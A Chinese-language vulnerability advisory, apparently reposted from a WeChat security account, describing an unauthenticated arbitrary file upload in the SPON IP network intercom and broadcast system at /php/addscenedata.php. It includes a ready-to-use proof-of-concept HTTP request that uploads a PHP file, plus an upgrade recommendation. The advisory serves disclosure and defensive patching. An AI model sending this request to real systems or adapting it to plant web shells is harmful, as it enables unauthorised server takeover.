世邦通信SPON IP网络对讲广播系统任意文件上传漏洞

admin

109425
文章

90
评论

2024年6月19日20:26:00评论4 views字数 840阅读2分48秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

世邦通信SPON IP网络对讲广播系统任意文件上传漏洞

0x03 漏洞详情

漏洞类型：任意文件上传

影响：上传恶意脚本

简述：spon IP网络对讲广播系统的/php/addscenedata.php接口存在任意文件上传漏洞，未授权的攻击者可以通过该漏洞上传恶意脚本文件，从而控制整个服务器。

0x04 影响版本

spon IP网络对讲广播系统

0x05 POC

POST /php/addscenedata.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: multipart/form-data; boundary=xxxxxxxxxxxxxxxxxxxxxxxxxxxxAccept-Encoding: gzip, deflate, brConnection: close--xxxxxxxxxxxxxxxxxxxxxxxxxxxxContent-Disposition: form-data; name="upload"; filename="test.php"Content-Type: application/octet-stream<?php echo md5(1);unlink(__FILE__);?>--xxxxxxxxxxxxxxxxxxxxxxxxxxxx--

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.spon.com.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 世邦通信SPON IP网络对讲广播系统任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

世邦通信SPON IP网络对讲广播系统任意文件上传漏洞

暂无

0day|GeoServer远程代码执行漏洞(CVE-2024-36401)

Geoserver最全历史漏洞详解

HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

Geoserver Xpath 属性名表达式前台RCE漏洞（CVE-2024-36401）

Artifex Ghostscript任意代码执行漏洞（CVE-2024-29510）

CVE-2024-34331：Parallels Repack 权限提升

发表评论

在线咨询

微信